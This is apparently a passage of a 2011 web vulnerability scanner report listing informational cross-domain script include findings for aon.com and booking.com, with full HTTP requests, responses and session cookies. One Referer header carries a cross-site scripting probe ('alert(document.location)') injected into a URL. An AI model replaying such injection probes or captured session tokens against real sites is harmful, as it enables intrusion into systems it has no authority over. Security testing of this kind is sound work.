<SCRIPT SRC="http://an.tacoda.net/an/17799/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
<!-- ATG_AVAILABLE_A20 -->

<script type="text/javascript" src="//static.atgsvcs.com/js/atgsvcs.js"></script>
...[SNIP]...
20.43. http://www.aon.com/manchesterunited/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aon.com
Path:   /manchesterunited/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /manchesterunited/ HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.aon.com/unitedin2010/?lid=aonbutton
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Date: Sun, 02 Oct 2011 23:59:06 GMT
Content-Length: 12997

<!DOCTYPE html>
<html lang="en">
   <head>
       <meta charset="utf-8" />
       <title> Aon and Manchester United: We are United </title>
       <link rel="stylesheet" href="styles.css" media="screen"/>
       <script src="http://cdn.jquerytools.org/1.2.2/full/jquery.tools.min.js"></script>
...[SNIP]...
<!-- video player overlay. -->
       <script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
20.44. http://www.booking.com/general.en-us.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /general.en-us.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /general.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;tmpl=docs/about HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN41dGlG0KbBsKqdlryV2YMpyAycJPmGespKu%2FhvMH%2Bcml0MfZ8A3ADJmd0MPnRSrNRZRaXhMOvd2kmD1ykHQKaTCcYuaNBykbfcIHf7qGipxec1ymPHBj%2BSPuY3eJ2t1gAhSxFt7C%2BXKIWT1%2BF%2BNseMD8tm%2BoBpHmY%2B4G8epSAxtgFe1r%2FZ%2BxYDjuD2NpPo6C9jBeKN0S3X8qZLiL35HDHITVkM52TvKbaTeW4KxHTDD5RUcIueLKTZg0BO87d9%2Fxc9VCRdnjKNerj1geW2DZOmfjBGz9GYJMoCdarKmUVAsnR0iXlxgtoIXiGK6B0iPx0xH19c3KJP%2Fkub96OFhR33o7ZjjY237VztvCv20%2BHP3eevg5x8InAGExRh%2BYDvVr7pMcvgIG%2Biwukv%2Bq9IdotNCKKOLZ6LNaa3MP5RZd4JuSJ7vTwJ1p7wUjgsfT2YbU1xQeOK0dMNLi3JElFSD4F%2FYFW9YiNE7m9wsE1lVwpCtME41Qchw1Vrngk0a1c2nsxR9AK8%2BdGLTXQZIqaX4yxY6u6rDwYTTn9YDLkgj%2FqhC0cwPd3mWQk2TRp7JjCV6QejLIM9ULw05UxEAjMpxK3vPohrcX2dsf%2BWDK0fV7zagYQT75cLLxuOgvaBbz90dOfvgIsFEMSW9sv9%2BxL10EqJVw1joKPhcjSWnExfbMdsPwCTbHfJjKvai8%2BeQjZXTUdImR26CVh6mh94DKTT2raUiRxZ5uqelBYtyq9RuiJ%2BpbscXeCEQqzzhaWnh6i3tUV4WbqEugtNMgyRESMS1MnuJG7QiKCzkPwKX%2B%2Fxf1UUgjxu%2BwiKHptFD3Gm0ZKfZYcSGS6wybLkXfBw3muIaLdnewJ%2BpktRlg%2BNM6RkvzSSrP0W%2FiY7C8yQ7YJO5ly%2FdA4yb2eNrI2eaSdHozvCCCVTHBJhW4MqhZ%2B3nHMhXrSa%2F3pP9dmdho1W%2Br6D5fEJmtuYd6%2BmW2CPKlXnvJE%2BWu%2F3HIBZaTQze6WQZBzPFo1MFb9EaE14fMMVy7QmARBtbNqT5hU3b4gi2RCrc57nrocp6I6V786mK%2FXMTbtzGwruafLcYHsfPiR8bJphP3zeq9fFHeR2PL4RIPEK4qhSIOgu5t%2BRQaCb37oFN1O%2BThaGtxLG5Zx%2BrhnjoX%2BIh6Ugpw0W8qzEURgDkAxaWeVhqSVEFhcUByxRvPZl5ooVeMvflIYStfkx4fo1p7XLfUSIwc1ZSQBCt1Xi7L34Tl7mLvy1OzzWRkNtG2J0U21ZAtpTsV0%2B5WXRMAZHIo8j3YhZPe6Sy58aUCfgQu%2FHDYDHxKLTRS%2F3hToUO2lIaqTSxxDxjZiwuWpTRETXxHgk6R0Zm5X3xC2768YFIzCnCh%2FFYvpX4Ydn8FeRl9mompZttcmHllz%2FCH2TKO3pA%3D%3D; __utma=1.1339354214.1317600621.1317603252.1317603725.3; __utmb=1.6.9.1317605413177; __utmc=1; __utmz=1.1317603725.3.3.utmcsr=tripad|utmccn=(not%20set)|utmcmd=SPPC|utmctr=hotel-59554|utmcct=text-cr; BJS=-; ramala=5.31764388084412

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:31:15 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YUFsPGDw%2F3YvsmbEMnpK9%2F5N%2B025mTgFVBfR64%2FgKzgcZwS2BG%2FpVqxxgeiiGa2Aij6eAdFCIoFktHJRCU7t6pG8eYurfp1mo97MaE6Xt3SQiUpot4wcm%2Ful3h2cCp3Aq3v9fFndje7J5kBuXpqwKFwzq1d8NFsqOMXkMLOh8MheA4SvhsDED1JW8Lzq1pPPuNWkLtLa2nYu4GrPir7OHtXIl44wyZZqW%2BoUI25Qt%2Bq%2FThnN11dNMvpllwZf%2BFUGaF0yEYQWfEUxqgLGBTcGCbPL2PoJSvzs3aJcz6peq6OJcz0X3v8XJzxlrl3Re%2B4fMPNVGOKw3OXRjD9BApu3kdB%2B4DfNedCdH7nvJIk8bHMsdAXvWaipTAaEEr77iSzcDzu0k4Pb0VGYDgJMguGhKAboI9qdT5%2FfoxQD1ZO10v0YKUwppRIyD0a3Ln9PUrxwZkhSSkHFlrAVjent8lv1qDG2xdp9lmPdV5vh3rRmuN1Lz0QN%2F3V2Sn9fPeJsHrK0pcgOYpSyW0n95GoFoyAkBhI17Phwo7yrvrjeDNHmxKMRkraR5MdqFJBuwCVd9dBvXoVyxW413W13jwOQsaHZx8iPdphluzMD5h3jwOEjlDkBpFkAF0kJZnoHDtUP3l1iRU%2FdEKfImnJ%2FQISsSKIW2wR5lSf%2F1SximqCADYBfEBvNs%2Bb4p%2BXQ0a42SQI1HuZMn7XZ3eadU1vaR0aacQEhT%2BTMbKt5QCA48TalbFf5k5egYBg9r%2B4N8uoiUgQQYx%2Ftt5AO9%2FVBRh7aJptr3L4saF02KTAh9Z0p5%2Fihhjlsn4hE28vhAsssqhO3O8S8giS%2BAD9yLu1raMti3QMcj0gfOfbUXo26HhPHD3cS56Ly4PlQzJm6UrwqCaLpO7KTYRTBFNfjq%2FicOkR6pMNZ1%2FC%2Fc0eZGJAjprFnEfcz%2Ff1D2udPGhpbVYLpVeRCyKbNt53ggYIGQr1TTkJ7xhSCCOCzTUXuE6dUGpUiWBZ7%2F3AHIMw6FvtaQBTat%2FQXE6ame41kAL%2B6V00yN0Xmopzv5yDpjigEcOO5oIMkGwsHdniwwtzhwSITaOyh2%2FKP0tbPU%2FCeKxA16ayEzJ5YKOenV4WVCjaYstXg3Le9A%2B%2BgxuR7X2ojY6dDXatodt%2F5RDf3maagBIdR6Oc6ZIKCZVYQTZjElDDZ8cp%2FgiTlLo6jDqUUyssnkr6X3M%2FAjD%2BrZNH8IuQKQM72Zu1cjPHJxdgPqO%2BOs%2F7rRh9o%2FTf5CKOGhXuc0PdC22WNwtICZpDHs8KyH%2F%2FopDWQBPuGzYzztul5MGNxkOl4zCU0jr3252eba8xA1Mw3aePG1Sf%2F8UQEgao7bg13Co2dpibytVWXIz1SXqF3vHV2vONIMhbOr0HejT8ddOxSgNDag0VIm1OAYgAbMxdRRA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:31:16 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 59658
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<!-- scripts_global.inc -->


<script type="text/javascript" src="http://s.bstatic.com/static/js/jquery-1.4.4.min.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/error_catcher.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/main.1191.js"></script>
...[SNIP]...
20.45. http://www.booking.com/hotel/us/c-boston-massachusettes.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:14 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YbKxbV%2FMJ74mwWA2qRP9ibjLlGSkGnixIN53jQSEFpZ%2Btt%2FEJbWxCwnNo9PFCYgujcC5zr%2FNnG2SXj%2FlwkxJh0Rlt6OoCAfAXC3G1Glp4pwRM49T3YD64Tefl5B%2BA6FojZRWNPqfRuwCMgCSmHsFJeZKeepvzYPcawzb3ElmfM8U3kB%2B0xUq4ewe4gLbFQ0okcCs2oila3oQmChJIOFelhvhIn3j4XqTiKyB%2BzNUZJLBDJC9FMQQsn%2F99mmnY3TlC%2FB6EQg2nU50Pd4t5idoU7FR6PL8ulD098rM8qIHr2I0DBfTZZ1JTx2qAEhooN7rqEfROrFcBxEYba%2FtDUB7St7FdNyKXMz4h1eh9eWzHmGeQIFzoBcbrv7%2FOlyH18uHrrwywNNBs%2B6CPYsZxHSrLNYNkA3p54cJwVJJtADgBE9vkTKuoaRbmXXXYcQ86rDIbGJUCDA2j0x8fpuMDPY2mQ%2BCdx%2FNusXDhxf%2BA0ZMhno3cUHHRqbWpereTJlY2vVu5h1Y2q7Cfi6ApwJWDv%2BfuO98fIM%2Fhu%2FX%2B0SLvl%2B%2Fjx1LGZc1US2Gz1ZieDavXXvciTa6rXmIm2%2FdKvW7s4q2AwZtOX30qxBGshCyJgjKtgjiMCxDyxFVdf7EcVq4JTOguZfxVqHRR%2B%2Fcy%2BSAsTRg9zqx%2FtST2kRIticJJiOXs6ArJfMau9s79Jc%2FA8jvUPg%2F2bBTHy7Yjm1PE3illu56a6dgj0n1%2Fyb0UCfVwE5jRsU%2BKkT7s7cUmVhAVhZ9usxmGKlwYdTA2rY%2FaI9lxsClMjpiDXHCWmXJc2FaVspfJMjtvDmIanyPF9zgnyRRAeWeq73NdAIQVD9Zkcn0w3u78GbuMZtBlzzxK9usz%2BTZzzq0pw5svZbpRvL0MkGkwvD7cMgq0i%2F6a1NX3K1Ch4yWCS%2BHLRvlcSHdTUywk0u%2B0xmqD2%2Bxg8uxhsE1%2FdvBw93mjrIZu5AP3L4MmqoA9edCGGVPgqIJBf01YcyckRX0%2F0cTNB3u%2Bl5Ype%2FywAfb%2Fa8awDp9BWNKgj%2B6EqGsglDnmUWQN3JweXVWhgzBOpzywYIa2d4nWm0alm9aDppC34Dcx8P7tuThuOduYpc1bkAp%2FVnuVGE9T8ESzu%2B9adrUWruCp%2BLpAUvAIiGYGNFTgEAiQCQ8xz2aIjBa1urHpuk2GZtYTUi4j5ROFYT4DXZ1IAVCPuvuTFnqiS2HnjKi4xJXmNmkg8rBg9xWoDZ%2BH0wwqRX4iZWOY3i5iNEwebqtaoie%2BP7r6G%2FLQUM7pXZ4w0OMpQMyQi%2FVFaQETCe9980e9NIYR8OQkNVLofepzbE1hCbxXn6Q0kJJKpE%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:02:15 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232378
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<!-- scripts_global.inc -->


<script type="text/javascript" src="http://s.bstatic.com/static/js/jquery-1.4.4.min.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/error_catcher.1191.js"></script>
...[SNIP]...
<img src="http://q.bstatic.com/static/img/marker-city-large.png" style="display: none;" />


<script type="text/javascript" src="http://q.bstatic.com/static/js/main.1191.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/maps_v3.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/hotel.1191.js"></script>
...[SNIP]...
20.46. http://www.booking.com/hotel/us/copley-square.en-us.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:15 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9Yc0ZDC9Mu1EAoq1YwiyYkrOHiSAuf28JqI%2BHOflGdlheWSd4aqQ4S9kWAAPfsgw9D66T4wFMCvqGXXx5W9GuJCr25Uqmhj2UpMobDN%2FaI4MouzypAXiHMMHYcyBghPwRPhIR0vlB6Ol8jmLM553G35F%2B2EC9Ct3b6%2FTJ5NqEwZrR9Q%2FH0ukz26yit6QyLTSqcuI2HLQ0VsBUAFVCwlLNxmZuDxyotE%2FwnVYDN1NaPr%2BQ2jMezA%2BQ93xNHE6sHvC2H6NcKqXTt11C7HRYqikso%2BSN%2F4epQIaoqYzVIVHsmZRY8UEQjW5%2FO3Xg3BPtScIum6RN1CcSwBbw2larrInKU6nVmRnGhZFZSu5P%2BH00JmkPzIwtu%2BRR4GgAt2IGq05uSTlyXitF3cA50IfBrXVmzdkzGeF1VQCDl7z%2Bt%2FJ%2FKFnjy9xLhsGvqxJch%2BJrNhkB55c%2FG59roS3buqyAq0TEWAvcdvIs6%2F2UswXdj84aVmCpFWEP7U4%2B3xDuwHi0ZNcE5TtRm2o%2F%2BoVJd9F2TJoqWCE3rBlE2yxL6TdLx9MVgUJv1gc41uBXXGirUBK4SUch8xbCWkl6QTjnYqTCwy8Q%2B%2BmmvhcEChhoBMA6VhIARqLepo8zZ4NgkZsML2nekGw6xRTGM3ca9%2BhMNuoQerjyZvoEu%2FiiH5epR8lpu1HdXNkP0JMNwUWbXzVoEFW92XZe0L8NnZnv34ij1h7BNEk%2BNfqH74wSscgE3wSh0k6ppJE%2Fv9Q8CWuQjBxGKNwr1f2m4Y5TBAI%2BXMckHMBU4%2FG7kpH9XWlaEE4jIt3ALDerskaJo%2BV8L3WCqL8TpX%2BjJlIwJorneFW4eRPNnjpO7sa5YnjqXQwY7kXZWJmN0iVllVt%2FYiNv%2BJq27oaMfjKg7Cz%2BYMz6xSi358Az%2BUCKrCbX68Fejx4UjmRPykDsTcLdD%2BEgyrL1SNvGkFwireGYoqBlUwvX3GYoLcIqONZ4Yuut3w9lOOQNlzXsEUDgQVh%2BI9y7LbESfSW6qGzvYcPpv9xT5TvyQz8z%2FdLDnJJE4D%2BCX2OqQECV32gxKWqLDPgPMvd5a6f3QefT%2BprihDvGDFB%2BprGC%2BccmQL6Yqlr1LqR8bUfmLkF2zwpJUXtO99dcZUw7e6ZxAAvL%2BYr9RrWIU3HuipBrjB%2BVvi9H6DSiBWFxPZk8JvSfmEGq6tDPdi7w2Eyzhum14uflewChdQsVk0SSagrC%2FFdQVu0SyWSHpLf9foVCCVupPIIZ53zHlztSaLpLIAQ7h0rb0XNYPeGEKZaU%2F5jXL2MP2Dnersuv1CqSOtI2VraCP4a6Djbv98BjLgf8UNBaznO6oUgiu4eKAEvOAmLbwIDPAnRTWvBX6d4fP68Dujy0%2FEg9nDhyC4YyPhd8sGLqQCt8iqt3wu7ZlqNcOFUdd6sQlb91qP8GTmymg04fczRJUsyLLBjH4iyApv8l; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:14:16 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 248794
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<!-- scripts_global.inc -->


<script type="text/javascript" src="http://s.bstatic.com/static/js/jquery-1.4.4.min.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/error_catcher.1191.js"></script>
...[SNIP]...
<img src="http://q.bstatic.com/static/img/marker-city-large.png" style="display: none;" />


<script type="text/javascript" src="http://q.bstatic.com/static/js/main.1191.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/maps_v3.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/hotel.1191.js"></script>
...[SNIP]...
20.47. http://www.booking.com/index.en-us.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /index.en-us.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/hotel57'%3balert(document.location)//f/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YbKxbV%2FMJ74miFZb2Um8KgC%2Bh2rlNFJUOjhhIgDQiMlPWhvbR49z9NRCDXfmSFpQembJKACe%2BJULD0r7fdmKnWzXr6Q37gpPtlW%2B6Ycux8%2BQPqDGsS1KPc9u0j692wwry%2B1siL5lr7hR9RhSAx8eI5I5k7yEH5VzxQ664kWGsWIUlKeHSweLMihfk6DPyMYhl866qu17PfAa6RO7hkvCmVs2v%2BaHqg7PJzGQbn7fwikGZMVbIAz4LrPjzYz6RGzlbxPK5%2F6ncWhf61P8AYKmRsuHJABk5Lxudx1AECQ0vDe%2B5%2F1VK1DpRN%2FD3xPq17PxcY9moJWiAb%2BjDEsnffG8T15GZqbMnfilArnMwyxxOT479XlQbNZXA5wZsuxCJNcZhMvajEXssRbYOUmix6AuHsUneEzF62bP002BL%2BgHy8NmOxhlKYaZlXZminydIqX%2Fu%2FBy9TbfbjXbd6r03fOvrqSW1QZ5jOepBwaJyVDLVWgjbd7NGZGnNsrR8ymzJg6wSt%2BGBUXZRUrcXlY6XVXUb8p7iRLBqAwcZN69gzv7DlytCjEgIc8%2F1Pep0%2Bm1h%2BeZlaydw4HC8erBX0MQS0wB%2BXiV0wXshT55Dj0GZBEX9npRlDKVH1zcH5tfl%2BmWNqGH5XrB8at9vS%2BFPgBOKqzPuPTEEm8M58LZw0SljaZgLLizNagYMqS2INu%2FxnbGaVC%2ByaJm99%2BSM7Is7WKkS82lDPlkm2julAIA%2Bq8cNhWIfpowac5T4r5u8Fn6f47z4hzIRARVjqBajBoVpoaNDPINwfkzD4VfF56AGT0g5nl8Q7zNch34tNcMpk1%2BpxM9%2BeaPaq8rTMHiSOsqbFRFOpXlvDxoUc439HccepEUKuW5qaj1VtdMlnVkiFiM%2Bv%2FwpfCePqzf0HGDSWdKf4NdncvuGc4CXQI%2BcT1om0pVGjGqsomGmH5HTip5D56Qw4RbL1v%2BcB6vVJ8%2F%2BKKQpUqdlMXTFa1kXsfq1zqNHmx93uxn4vcRnr2nx4M%2Fa2unp0CpnQQtAdh8E%2FREJ8eW%2FMdmAsrtsIFg0YBu5y4jzrewC%2FkgM9lOWRIg7XukObhLsYxWaE2laG%2B2TpO4jVJz35UlsuhFr2M5p%2Bd57HfkCUX%2BZTXu6qnSpFmzXSfgDeuWJWTFzXoBQEohozrytDzbYjlfb%2B7JSaJ1vXhcy15EpDbJEyN7kfvx%2Bi4F9skpy0c1fc5ZZIjkPBPbd9qFhsWxA8UMVqn8PV68J